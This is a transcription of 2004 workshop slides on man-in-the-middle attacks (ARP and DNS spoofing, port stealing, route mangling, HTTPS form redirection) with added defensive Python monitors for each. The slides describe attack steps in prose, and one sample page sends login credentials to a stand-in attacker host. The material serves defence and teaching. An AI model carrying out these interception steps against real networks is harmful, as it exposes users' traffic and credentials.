IIT Kanpur Hacker’s Workshop 2004, 23, 24 Feb 2004
A current analysis of man in the middle (mitm) attacks
Sachin Deodhar <[email protected]>

The scenario

(diagram: Server, Client, Attacker)

MITM attack scenarios TOC

Different attacks in different scenarios:

LOCAL AREA NETWORK:
- ARP poisoning
- DNS spoofing
- STP mangling
- Port stealing

FROM LOCAL TO REMOTE (through a gateway):
- ARP poisoning
- DNS spoofing
- DHCP spoofing
- ICMP redirection
- IRDP spoofing
- route mangling

REMOTE:
- DNS poisoning
- traffic tunneling
- route mangling

MITM attack techniques: The local scenario

Local attacks (1): ARP poisoning

- ARP is stateless (we all know how it works and what the problems are)
- Some operating systems do not update an entry if it is not already in the cache; others accept only the first received reply (e.g. Solaris)
- The attacker can forge spoofed ICMP packets to force the host to make an ARP request. Immediately after the ICMP it sends the fake ARP reply.

The scenario

(diagram: Server, Client, Attacker; forged gratuitous ARP messages sent by the attacker)

Local attacks (1): ARP poisoning - Tools

ettercap (http://ettercap.sf.net)
- Poisoning
- Sniffing
- Hijacking
- Filtering
- SSH v.1 sniffing (transparent attack)

dsniff (http://www.monkey.org/~dugsong/dsniff)
- Poisoning
- Sniffing
- SSH v.1 sniffing (proxy attack)

Local attacks (1): ARP poisoning - countermeasures

YES - passive monitoring (arpwatch)
YES - active monitoring (ettercap)
YES - IDS (detect but not avoid)
YES - Static ARP entries (avoid it)
YES - Secure-ARP (public key authentication)
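
The passive monitoring countermeasure (arpwatch) works by learning which MAC address each IP has announced and reporting when that binding changes. The following is an added example written for this page; it is not code from the talk, from arpwatch or from ettercap. It parses raw Ethernet/ARP frames, keeps an IP-to-MAC table, and reports a "changed" binding (a new MAC for a known IP) or a "flip-flop" (a return to an earlier MAC), which is exactly what the forged gratuitous ARPs in the scenario diagram produce. The sample frames, MAC addresses and the 10.1.1.0/24 addresses are constructed in memory for the demonstration; nothing is put on the wire.

```python
import struct

ETH_TYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)
def mac_bytes(s): return bytes(int(x, 16) for x in s.split(":"))
def ip_bytes(s): return bytes(int(x) for x in s.split("."))

def parse_arp_frame(frame):
    """Parse an Ethernet II frame carrying IPv4-over-Ethernet ARP.
    Returns the fields a monitor cares about, or None if the frame is not ARP."""
    if len(frame) < 42:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "eth_src": mac_str(frame[6:12]),
        "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42]),
    }

def build_arp_frame(op, eth_src, eth_dst, sender_mac, sender_ip, target_mac, target_ip):
    """Assemble an in-memory Ethernet/ARP frame as sample input (nothing is transmitted)."""
    eth = mac_bytes(eth_dst) + mac_bytes(eth_src) + struct.pack("!H", ETH_TYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp

class ArpMonitor:
    """arpwatch-style passive monitor: learns IP -> MAC bindings from ARP traffic
    and reports when an IP starts claiming a different MAC."""
    def __init__(self):
        self.current = {}    # ip -> MAC most recently announced for it
        self.history = {}    # ip -> every MAC ever announced for it

    def observe(self, frame):
        arp = parse_arp_frame(frame)
        if arp is None:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        # An ARP sender MAC that differs from the Ethernet source MAC is a tell on its own.
        if mac != arp["eth_src"]:
            return f"mismatch: ARP sender {mac} in frame from {arp['eth_src']} (ip {ip})"
        seen = self.history.setdefault(ip, set())
        previous = self.current.get(ip)
        was_known = mac in seen
        seen.add(mac)
        self.current[ip] = mac
        if previous is None or previous == mac:
            return None
        # arpwatch calls a return to an earlier MAC a "flip flop"; anything else is "changed".
        kind = "flip-flop" if was_known else "changed"
        return f"{kind}: {ip} was {previous}, now {mac}"

def run_demo():
    """Constructed sequence: a normal request/reply, then a forged reply for the
    gateway's IP from another MAC, then the real gateway answering again."""
    gw_mac, gw_ip = "00:00:5e:00:01:01", "10.1.1.1"
    host_mac, host_ip = "00:0c:29:12:34:56", "10.1.1.50"
    rogue_mac, bcast, zero = "de:ad:be:ef:00:01", "ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"
    frames = [
        build_arp_frame(ARP_REQUEST, host_mac, bcast, host_mac, host_ip, zero, gw_ip),
        build_arp_frame(ARP_REPLY, gw_mac, host_mac, gw_mac, gw_ip, host_mac, host_ip),
        build_arp_frame(ARP_REPLY, rogue_mac, host_mac, rogue_mac, gw_ip, host_mac, host_ip),
        build_arp_frame(ARP_REPLY, gw_mac, host_mac, gw_mac, gw_ip, host_mac, host_ip),
    ]
    monitor = ArpMonitor()
    return [monitor.observe(f) for f in frames]
```

The monitor only detects: as the slide says of IDS, it cannot prevent the cache from being poisoned. A first-seen binding is trusted, so the table should be seeded from a known-good state (or static entries) before the monitor is relied upon.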

Local attacks (2): DNS spoofing

(diagram: HOST, DNS server, MITM; query for X.localdomain.in; addresses 10.1.1.50 and 10.1.1.1)

If the attacker is able to sniff the ID of the DNS request, he/she can reply before the real DNS server.

Local attacks (2): DNS spoofing - tools

ettercap (http://ettercap.sf.net), Phantom plugin
dsniff (http://www.monkey.org/~dugsong/dsniff), dnsspoof
zodiac (http://www.packetfactory.com/Projects/zodiac)

Local attacks (2): DNS spoofing - countermeasures

YES - detect multiple replies (IDS)
YES - use the lmhosts or hosts file for static resolution of critical hosts
YES - DNSSEC

Local attacks (3): STP mangling

It is not a real MITM attack since the attacker is able to receive only “unmanaged” traffic.

The attacker can forge BPDUs with high priority, pretending to be the new root of the spanning tree.

Local attacks (3): STP mangling - tools

Ettercap (http://ettercap.sf.net) with the Lamia plugin

Local attacks (3): STP mangling - countermeasures

YES - Disable STP on VLANs without loops
YES - Root Guard, BPDU Guard

Local attacks (4): Port stealing

The attacker floods the switch with forged gratuitous ARP packets with the source MAC address being that of the target host and the destination MAC address being that of the attacker. Since the destination MAC address of each flooding packet is the attacker’s MAC address, the switch will not forward these packets to other ports, meaning they will not be seen by other hosts on the network.

A race condition arises, because the target host will send packets too. The switch will see packets with the same source MAC address on two different ports and will constantly change the binding of the MAC address to the port. Remember that the switch binds a MAC address to a single port. If the attacker is fast enough, packets intended for the target host will be sent to the attacker’s switch port and not the target host.

When a packet arrives, the attacker performs an ARP request asking for the target host’s IP address. Next, the attacker stops the flooding and waits for the ARP reply. When the attacker receives the reply, it means that the target host’s switch port has been restored to its original binding. The attacker now sniffs the packet and forwards it to the target host and restarts the attack ad nauseam …

Local attacks (5): Port stealing how to

(diagram: steps 1, 2, 3; hosts A and B and the Attacker on a Layer 2 switch; forged gratuitous ARP)

Local attacks (4): Port stealing - tools

ettercap (http://ettercap.sf.net) with the Confusion plugin

Local Attacks (4): Port stealing - countermeasures

YES - port security on the switch
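
Port security on the switch caps how many source MACs a port may learn; what the switch (or a monitor fed its MAC-learning events) sees during port stealing is one MAC bouncing between two ports. The following is an added example written for this page, not code from the talk or from any switch vendor. It models the switch's learning table over constructed (timestamp, ingress port, source MAC) events: a port that sources more MACs than its limit is a port-security violation, and a MAC that changes port more than a set number of times inside a window is reported as flapping. The port names and MAC addresses are made up for the demonstration.

```python
from collections import defaultdict, deque

class SwitchPortMonitor:
    """Models what a switch's port-security feature and a MAC-move monitor observe.
    learn() takes (timestamp, ingress port, source MAC) for a frame and returns an
    alert string, or None when the frame fits the learned picture."""
    def __init__(self, window=10.0, max_moves=3, max_macs_per_port=1):
        self.window, self.max_moves, self.max_macs_per_port = window, max_moves, max_macs_per_port
        self.last_port = {}                   # mac -> port it was last learned on
        self.moves = defaultdict(deque)       # mac -> timestamps of recent port changes
        self.port_macs = defaultdict(set)     # port -> MACs seen sourcing frames on it

    def learn(self, ts, port, mac):
        previous = self.last_port.get(mac)
        self.last_port[mac] = port
        self.port_macs[port].add(mac)
        moved = previous is not None and previous != port
        if moved:
            recent = self.moves[mac]
            recent.append(ts)
            while recent and ts - recent[0] > self.window:   # forget moves outside the window
                recent.popleft()
        # Port security: an access port that sources a second MAC is a violation
        # (a real switch would drop the frame or err-disable the port here).
        if len(self.port_macs[port]) > self.max_macs_per_port:
            return (f"port-security: {port} sources {sorted(self.port_macs[port])}, "
                    f"limit {self.max_macs_per_port}")
        # MAC move: the same address bouncing between two ports is the race the
        # port-stealing description relies on.
        if moved and len(self.moves[mac]) > self.max_moves:
            return (f"mac-flap: {mac} moved {len(self.moves[mac])} times in {self.window}s "
                    f"(last {previous} -> {port})")
        return None

def run_demo():
    """Constructed events: the target (B) on Gi1/0/3, the attacker on Gi1/0/2 sending
    frames whose source MAC is B's, and B's own frames interleaved with them."""
    victim, attacker = "00:0c:29:aa:bb:cc", "de:ad:be:ef:00:01"
    events = [
        (0.0, "Gi1/0/3", victim),
        (0.2, "Gi1/0/2", attacker),
        (0.5, "Gi1/0/2", victim),     # B's MAC appears on the attacker's port
        (1.0, "Gi1/0/3", victim),
        (1.5, "Gi1/0/2", victim),
        (2.0, "Gi1/0/3", victim),
    ]
    monitor = SwitchPortMonitor(window=10.0, max_moves=3, max_macs_per_port=1)
    return [monitor.learn(*e) for e in events]
```

With port security enforced at one address per access port, the third event is already refused, so the flapping never gets far enough to steal traffic; the flap rule matters on ports where a MAC limit cannot be set (uplinks, ports behind hubs), where it gives detection but not prevention.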

Attack techniques: From local to remote

Local to remote attacks (1): DHCP spoofing

The DHCP requests are made in broadcast mode.

If the attacker replies before the real DHCP server it can manipulate:
- IP address of the victim
- GW address assigned to the victim
- DNS address

Local to remote attacks (1): DHCP spoofing - countermeasures

YES - detection of multiple DHCP replies
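
"Detection of multiple DHCP replies" means watching the broadcast segment for DHCPOFFERs and noticing when one transaction is answered by more than one server, or by a server that is not the authorised one. The following is an added example written for this page, not code from the talk. It parses the BOOTP header and DHCP option TLVs (message type 53, server identifier 54, router 3, DNS 6), keeps an allowlist of DHCP servers, and reports both a rogue server and a transaction with offers from two servers. The server, router and DNS addresses and the transaction ID are constructed for the demonstration; the offers are built in memory and never sent.

```python
import struct
from collections import defaultdict

DHCP_MAGIC = b"\x63\x82\x53\x63"
DHCPOFFER = 2
OPT_ROUTER, OPT_DNS, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 3, 6, 53, 54, 255

def ip_str(b): return ".".join(str(x) for x in b)
def ip_bytes(s): return bytes(int(x) for x in s.split("."))

def parse_dhcp(payload):
    """Parse the fixed BOOTP header and the DHCP option TLVs of a UDP payload."""
    if len(payload) < 240 or payload[236:240] != DHCP_MAGIC:
        return None
    op, _htype, hlen, _hops, xid = struct.unpack("!BBBBI", payload[:8])
    options, i = {}, 240
    while i < len(payload):
        code = payload[i]
        if code == OPT_END:
            break
        if code == 0:                     # pad option carries no length byte
            i += 1
            continue
        if i + 1 >= len(payload):
            break
        length = payload[i + 1]
        options[code] = payload[i + 2:i + 2 + length]
        i += 2 + length
    return {"op": op, "xid": xid, "yiaddr": ip_str(payload[16:20]),
            "chaddr": payload[28:28 + hlen], "options": options}

def build_offer(xid, yiaddr, server_id, router, dns):
    """Assemble a DHCPOFFER payload in memory as sample input (nothing is transmitted)."""
    hdr = struct.pack("!BBBBIHH", 2, 1, 6, 0, xid, 0, 0)                 # BOOTREPLY, Ethernet
    hdr += ip_bytes("0.0.0.0") + ip_bytes(yiaddr) + ip_bytes(server_id) + ip_bytes("0.0.0.0")
    hdr += bytes(16) + bytes(64) + bytes(128) + DHCP_MAGIC               # chaddr, sname, file
    opts = bytes([OPT_MSG_TYPE, 1, DHCPOFFER])
    opts += bytes([OPT_SERVER_ID, 4]) + ip_bytes(server_id)
    opts += bytes([OPT_ROUTER, 4]) + ip_bytes(router)
    opts += bytes([OPT_DNS, 4]) + ip_bytes(dns)
    return hdr + opts + bytes([OPT_END])

class DhcpOfferMonitor:
    """Watches DHCPOFFERs on the segment: flags offers from servers outside the
    allowlist and transactions answered by more than one server."""
    def __init__(self, authorized_servers):
        self.authorized = set(authorized_servers)
        self.offers = defaultdict(dict)        # xid -> {server id: (yiaddr, router, dns)}

    def observe(self, payload):
        msg = parse_dhcp(payload)
        if msg is None or msg["options"].get(OPT_MSG_TYPE) != bytes([DHCPOFFER]):
            return []
        opts = msg["options"]
        server = ip_str(opts.get(OPT_SERVER_ID, bytes(4)))
        router = ip_str(opts.get(OPT_ROUTER, bytes(4)))
        dns = ip_str(opts.get(OPT_DNS, bytes(4)))
        seen = self.offers[msg["xid"]]
        seen[server] = (msg["yiaddr"], router, dns)
        alerts = []
        if server not in self.authorized:
            alerts.append(f"rogue-server: xid {msg['xid']:#x} offered {msg['yiaddr']} by {server} "
                          f"(router {router}, dns {dns})")
        if len(seen) > 1:
            alerts.append(f"multiple-offers: xid {msg['xid']:#x} answered by {sorted(seen)}")
        return alerts

def run_demo():
    """Constructed exchange: the real server and a second host both answer one DISCOVER."""
    monitor = DhcpOfferMonitor(authorized_servers={"10.1.1.2"})
    xid = 0x3903F326
    legit = build_offer(xid, "10.1.1.50", "10.1.1.2", "10.1.1.1", "10.1.1.2")
    rogue = build_offer(xid, "10.1.1.50", "10.1.1.66", "10.1.1.66", "10.1.1.66")
    return [monitor.observe(legit), monitor.observe(rogue)]
```

The rogue offer is recognisable by its server identifier even when it wins the race the slide describes; the gateway and DNS options it carries are what turns a DHCP spoof into a local-to-remote man in the middle, so they are included in the alert text.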

Local to remote attacks (2): ICMP redirect

(diagram: G1, AT, H, T on the LAN; "ICMP redirect to AT")

The attacker can forge an ICMP redirect packet in order to redirect traffic to himself.

Local to remote attacks (2): ICMP redirect - tools

IRPAS icmp_redirect (Phenoelit) (http://www.phenoelit.de/irpas/)
icmp_redir (Yuri Volobuev)

Local to remote attacks (2): ICMP redirect - countermeasures

YES - Disable the ICMP REDIRECT
NO - Linux has the “secure redirect” option but it seems to be ineffective against this attack
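
An ICMP redirect carries the address of the new gateway and quotes the header of the datagram it applies to, so a host or IDS can check a redirect against what it knows about the network before honouring it. The following is an added example written for this page, not code from the talk or from any operating system. It parses an IPv4/ICMP type 5 message, verifies the ICMP checksum, and applies a policy: the redirect must come from the current gateway, the new gateway must be on-link and on an allowlist of known routers, and the quoted destination must be off-link. The addresses (host 10.1.1.10, gateway 10.1.1.1, a second router 10.1.1.2, attacker 10.1.1.66, remote target 198.51.100.7) and the packets are constructed in memory for the demonstration.

```python
import ipaddress
import struct

ICMP_REDIRECT = 5
PROTO_ICMP = 1

def inet_checksum(data):
    """RFC 1071 ones'-complement checksum; a message with its checksum field filled sums to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def parse_ipv4(pkt):
    ihl = (pkt[0] & 0x0F) * 4
    return {"proto": pkt[9], "src": str(ipaddress.IPv4Address(pkt[12:16])),
            "dst": str(ipaddress.IPv4Address(pkt[16:20])), "payload": pkt[ihl:]}

def parse_redirect(icmp):
    """Return the redirect's new gateway and the addresses of the datagram it quotes."""
    if len(icmp) < 28:
        return None
    icmp_type, code, _csum, gw = struct.unpack("!BBH4s", icmp[:8])
    if icmp_type != ICMP_REDIRECT:
        return None
    quoted = parse_ipv4(icmp[8:])
    return {"code": code, "new_gateway": str(ipaddress.IPv4Address(gw)),
            "checksum_ok": inet_checksum(icmp) == 0,
            "quoted_src": quoted["src"], "quoted_dst": quoted["dst"]}

def build_ipv4(src, dst, proto, payload):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    hdr = hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]
    return hdr + payload

def build_redirect(src, dst, new_gateway, quoted_packet):
    """Sample redirect-for-host (code 1) built in memory; nothing is transmitted."""
    body = struct.pack("!BBH4s", ICMP_REDIRECT, 1, 0, ipaddress.IPv4Address(new_gateway).packed)
    body += quoted_packet[:28]                       # quoted IP header + 8 bytes, per RFC 792
    body = body[:2] + struct.pack("!H", inet_checksum(body)) + body[4:]
    return build_ipv4(src, dst, PROTO_ICMP, body)

def check_redirect(pkt, local_net, known_routers, current_gateway):
    """Host- or IDS-side policy for an ICMP redirect. Returns a list of findings;
    an empty list means the redirect is consistent with the configured routers."""
    ip = parse_ipv4(pkt)
    if ip["proto"] != PROTO_ICMP:
        return []
    r = parse_redirect(ip["payload"])
    if r is None:
        return []
    net = ipaddress.ip_network(local_net)
    findings = []
    if not r["checksum_ok"]:
        findings.append("bad ICMP checksum")
    if ip["src"] != current_gateway:
        findings.append(f"sent by {ip['src']}, not the current gateway {current_gateway}")
    if ipaddress.ip_address(r["new_gateway"]) not in net:
        findings.append(f"new gateway {r['new_gateway']} is off-link")
    if r["new_gateway"] not in known_routers:
        findings.append(f"new gateway {r['new_gateway']} is not a known router")
    if ipaddress.ip_address(r["quoted_dst"]) in net:
        findings.append(f"redirect for on-link destination {r['quoted_dst']}")
    return findings

def run_demo():
    host, gw, router2, attacker, target = "10.1.1.10", "10.1.1.1", "10.1.1.2", "10.1.1.66", "198.51.100.7"
    policy = dict(local_net="10.1.1.0/24", known_routers={gw, router2}, current_gateway=gw)
    original = build_ipv4(host, target, 6, bytes(8))                 # the datagram being redirected
    legit = build_redirect(gw, host, router2, original)              # gateway points host at router2
    forged = build_redirect(gw, host, attacker, original)            # same source, attacker as gateway
    return check_redirect(legit, **policy), check_redirect(forged, **policy)
```

Note which rule fires on the forged message: the source-address check passes, because the redirect in the slide's diagram carries the gateway's address, which is the same reason the slide rates Linux's source-based "secure redirect" option as ineffective here. The router allowlist is what catches it; the simplest policy remains the slide's first one, to ignore redirects altogether.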

Local to remote attacks (3): IRDP spoofing

The attacker can forge advertisement packets pretending to be the router for the LAN. He/she can set the “preference level” and the “lifetime” to high values to be sure the hosts will choose it as the preferred router.

The attack can be improved by sending some spoofed ICMP Host Unreachable messages pretending to be the real router.

Local to remote attacks (3): IRDP spoofing - tools

IRPAS by Phenoelit (http://www.phenoelit.de/irpas/)

Local to remote attacks (3): IRDP spoofing - countermeasures

YES - Disable IRDP on hosts if the operating system permits it.

Local to remote attacks (4): ROUTE mangling

The attacker can forge packets for the gateway (GW) pretending to be a router with a good metric for a specified host on the internet.

(diagram: INTERNET, GW, AT, H)

Local to remote attacks (4): ROUTE mangling

Now the problem for the attacker is to send packets to the real destination. He/she cannot send them through GW since it is convinced that the best route is AT.

(diagram: INTERNET, GW, AT, H, D; tunnel from AT to AT2)

Local to remote attacks (4): ROUTE mangling - tools

IRPAS (Phenoelit) (http://www.phenoelit.de/irpas/)
Nemesis (http://www.packetfactory.net/Projects/nemesis/)

Local to remote attacks (4): ROUTE mangling - countermeasures

YES - Disable dynamic routing protocols in this type of scenario
YES - Enable ACLs to block unexpected updates
YES - Enable authentication on the protocols that support authentication

Attack techniques: Remote scenarios

Remote attacks (1): DNS poisoning

Type 1 attack
- The attacker sends a request to the victim DNS asking for one host
- The attacker spoofs the reply which is expected to come from the real DNS
- The spoofed reply must contain the correct ID (brute force or semi-blind guessing)

Remote attacks (1): DNS poisoning

Type 2 attack
- The attacker can send a “dynamic update” to the victim DNS
- If the DNS processes it, it is even worse because it will be authoritative for those entries

Remote attacks (1): DNS poisoning - tools

ADMIdPack
Zodiac (http://www.packetfactory.com/Projects/zodiac)

Remote attacks (1): DNS poisoning - countermeasures

YES - Use DNS with random transaction IDs (Bind v9)
YES - DNSSec (Bind v9) allows the digital signature of the replies
NO - restrict the dynamic update to a range of IPs (they can be spoofed)
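
Two of the countermeasures on this page come down to checks on the DNS transaction ID: the local "detect multiple replies (IDS)" rule under DNS spoofing, and "use DNS with random transaction ID" against the remote type 1 attack. The following is an added example written for this page, not code from the talk, from Bind or from any IDS, covering both. It parses DNS messages (header, question, A-record answers, name compression), reports a second response to the same (ID, name) that carries different addresses, and applies a heuristic to a resolver's outgoing IDs that flags a constant increment. The names, IDs and addresses are constructed for the demonstration; the messages are built in memory and never sent.

```python
import struct

def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"

def read_name(msg, off):
    """Decode a possibly compressed DNS name; returns (name, offset after it)."""
    labels = []
    while True:
        n = msg[off]
        if n == 0:
            return ".".join(labels), off + 1
        if n & 0xC0 == 0xC0:                          # compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = read_name(msg, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n

def parse_dns(msg):
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = read_name(msg, off)
        qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, qtype))
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:                 # A record: render as dotted quad
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, ttl, rdata))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}

def build_response(txid, name, ip, ttl=300):
    """Sample A-record response built in memory (nothing is transmitted)."""
    hdr = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    answer = b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, ttl, 4) + bytes(int(x) for x in ip.split("."))
    return hdr + question + answer

class DnsReplyMonitor:
    """Local-scenario IDS rule: a second response to the same (id, name) carrying
    different A records means two parties answered one query."""
    def __init__(self):
        self.first_answer = {}

    def observe(self, msg):
        d = parse_dns(msg)
        if not d["is_response"] or not d["questions"]:
            return None
        key = (d["id"], d["questions"][0][0])
        addrs = {rdata for _n, rtype, _ttl, rdata in d["answers"] if rtype == 1}
        if key not in self.first_answer:
            self.first_answer[key] = addrs
            return None
        if self.first_answer[key] != addrs:
            return (f"conflicting replies for {key[1]} id {key[0]:#06x}: "
                    f"{sorted(self.first_answer[key])} vs {sorted(addrs)}")
        return None

def txid_looks_sequential(txids):
    """Remote-scenario check: a resolver whose consecutive IDs differ by a constant
    step is guessable without sniffing; random IDs (Bind v9) remove that."""
    if len(txids) < 4:
        return False
    steps = {(b - a) & 0xFFFF for a, b in zip(txids, txids[1:])}
    return len(steps) == 1

def run_demo():
    monitor = DnsReplyMonitor()
    name = "x.localdomain.in"
    first = monitor.observe(build_response(0x1A2B, name, "10.1.1.66"))   # whichever party wins the race
    second = monitor.observe(build_response(0x1A2B, name, "192.0.2.10"))
    return (first, second,
            txid_looks_sequential([0x1000, 0x1001, 0x1002, 0x1003]),
            txid_looks_sequential([0x4E21, 0x93B0, 0x0A7F, 0xD155]))
```

The monitor cannot say which of the two replies is genuine, only that a race took place; in the local scenario the attacker has sniffed the ID, so randomness does not help there and the duplicate-reply rule (or DNSSEC validation) is what remains. The sequential-ID heuristic is deliberately crude: a 16-bit ID is small enough that the slide's "brute force" remains possible even when it is random, which is why the page pairs it with DNSSEC.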

Remote attacks (2): Traffic tunneling

(diagram: Router 1, Gateway, INTERNET, Server, Client, Fake host, Attacker; GRE tunnel)

Remote attacks (2): Traffic tunneling - tools

ettercap (http://ettercap.sf.net), Zaratan plugin
tunnelX (http://www.phrack.com)

Remote attacks (2): Traffic tunneling - countermeasure

YES - Strong passwords and community strings on routers

Remote attacks (3): ROUTE mangling revisited

The attacker aims to hijack the traffic between the two victims A and B.

The attack will collect sensitive information through:
- Traceroute
- port scanning
- protoscanning

Quite impossible against link state protocols.

Remote attacks (3): ROUTE mangling revisited

Scenario 1a (IGRP inside the AS)

(diagram: A, B, R1, R2; the attacker pretends to be the GW)

Remote attacks (3): ROUTE mangling revisited

Scenario 1b (IGRP inside the AS)

(diagram: A, B, R1, R2, R3)

Remote attacks (3): ROUTE mangling revisited

Scenario 2a (the traffic does not pass through the AS)

(diagram: AS 1, AS 2, AS 3; BG 1, BG 2, BG 3; BGP; RIP)

Remote attacks (3): ROUTE mangling revisited - tools

IRPAS by Phenoelit (http://www.phenoelit.de/irpas/)
Nemesis (http://www.packetfactory.net/Projects/nemesis/)

Remote attacks (3): ROUTE mangling revisited - countermeasure

YES - Use routing protocol authentication

Conclusions

The security of a connection relies on:
- proper configuration of the client (avoiding ICMP Redirect, ARP Poisoning etc.)
- the other endpoint’s infrastructure (e.g. DNS dynamic update)
- the strength of third-party appliances to which we don’t have access (e.g. Tunneling and Route Mangling).

The best way to ensure secure communication is the correct and conscious use of cryptographic systems, both client and server side:
- at the network layer (e.g. IPSec)
- at the transport layer (e.g. SSLv3)
- at the application layer (e.g. PGP).

Once in the middle…

- Injection attacks
- Key Manipulation attacks
- Downgrade attacks
- Filtering attacks

Injection attacks

- Add packets to an already established connection (only possible in full-duplex mitm)
- The attacker can modify the sequence numbers and keep the connection synchronized while injecting packets.
- If the mitm attack is a “proxy attack” it is even easier to inject (there are two distinct connections)

Injection attack examples: Command injection

Useful in scenarios where a one time authentication is used (e.g. RSA token). In such scenarios sniffing the password is useless, but hijacking an already authenticated session is critical.

- Injection of commands to the server
- Emulation of fake replies to the client

Key Manipulation in the case of popular VPN/crypto systems

- SSH v1
- IPSEC
- HTTPS

Key Manipulation attack example: SSH v1

Modification of the public key exchanged by server and client.

(diagram: Server, MITM, Client; start; KEY(rsa); Ekey[S-Key]; S-KEY; M, Eskey(M); D(E(M)))

Key manipulation attack example: IPSEC

If two or more clients share the same “secret”, each of them can impersonate the server with another client.

(diagram: Client, mitm, Server; Diffie-Hellman exchange 1, authenticated by pre-shared secret; Diffie-Hellman exchange 2, authenticated by pre-shared secret; De-Crypt Packet; Re-Crypt Packet)

Key manipulation attack example: HTTPS

We can create a fake certificate (e.g. issued by VerySign) relying on browser misconfiguration or user dumbness.

(diagram: Client, MiM, Server; fake cert. towards the client; real connection to the server)

Filtering attacks

- The attacker can modify the payload of the packets by recalculating the checksum
- He/she can create filters on the fly
- The length of the payload can also be changed but only in full-duplex (in this case the seq has to be adjusted)

Filtering attacks example: Code Filtering / Injection

- Insertion of malicious code into web pages or mail (javascript, trojans, virus, etc)
- Modification on the fly of binary files during the download phase (virus, backdoor, etc)

Filtering attacks example: HTTPS redirection

Let’s see an example.

(diagram: Client, MiM, Server; login, password; in order:)
- Http main page with https login form
- Change form destination to http://attacker
- Http post (login\password)
- Auto-submitting hidden form with right authentication data
- Real https authentication post
- Authenticated connection
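
The redirection above works only because the page that carries the login form is served over plain HTTP, so the form's destination can be rewritten in transit and the browser shows nothing unusual. A site operator (or a scanner) can check for that precondition. The following is an added example written for this page, not code from the talk. It parses a page with Python's html.parser, finds forms that contain a password field, and reports each condition that would let the form be redirected: page not served over HTTPS, action not HTTPS, action on another host, or a GET form. The sample page, the host www.example.com and the attacker host attacker.invalid are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class _FormCollector(HTMLParser):
    """Collects every <form> on a page with its resolved action, method and
    whether it contains a password input."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": urljoin(self.page_url, a.get("action") or ""),
                          "method": (a.get("method") or "get").lower(), "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and (a.get("type") or "").lower() == "password":
            self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

def audit_login_forms(page_url, html):
    """Return the ways a login form on this page could be redirected by someone
    rewriting the page in transit. Empty list: page and action are both HTTPS on
    the same host and the form posts."""
    collector = _FormCollector(page_url)
    collector.feed(html)
    page = urlsplit(page_url)
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        action = urlsplit(form["action"])
        if page.scheme != "https":
            findings.append(f"page served over {page.scheme}: the form action can be rewritten in transit")
        if action.scheme != "https":
            findings.append(f"credentials would be posted over {action.scheme} to {form['action']}")
        if action.hostname != page.hostname:
            findings.append(f"form posts to another host: {action.hostname}")
        if form["method"] != "post":
            findings.append(f"form uses {form['method'].upper()}, so credentials would land in the URL")
    return findings

# Constructed sample page: an HTTP main page whose login form posts to HTTPS,
# and the same page after its form destination has been changed.
ORIGINAL_PAGE = """<html><body>
<form method="post" action="https://www.example.com/login">
  <input name="login"><input type="password" name="password"><input type="submit">
</form></body></html>"""
REWRITTEN_PAGE = ORIGINAL_PAGE.replace("https://www.example.com/login", "http://attacker.invalid/login")

def run_demo():
    return (audit_login_forms("http://www.example.com/", ORIGINAL_PAGE),
            audit_login_forms("http://www.example.com/", REWRITTEN_PAGE),
            audit_login_forms("https://www.example.com/", ORIGINAL_PAGE))
```

The first result is the interesting one: the untouched page already has a finding, because an HTTPS action on an HTTP page is exactly the state the slide's first step starts from. Serving the page that contains the form over HTTPS is the fix; the audit then returns nothing.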

Page 57: Downgrade attacks for typical VPN/crypto systems

- SSH v2
- IPSEC
- PPTP

Page 58: Downgrade attack examples: SSH v2 to v1

- The parameters exchanged by server and client at the beginning of a connection (the protocol version first, then the algorithms to be used later) can be substituted by an attacker in the middle.
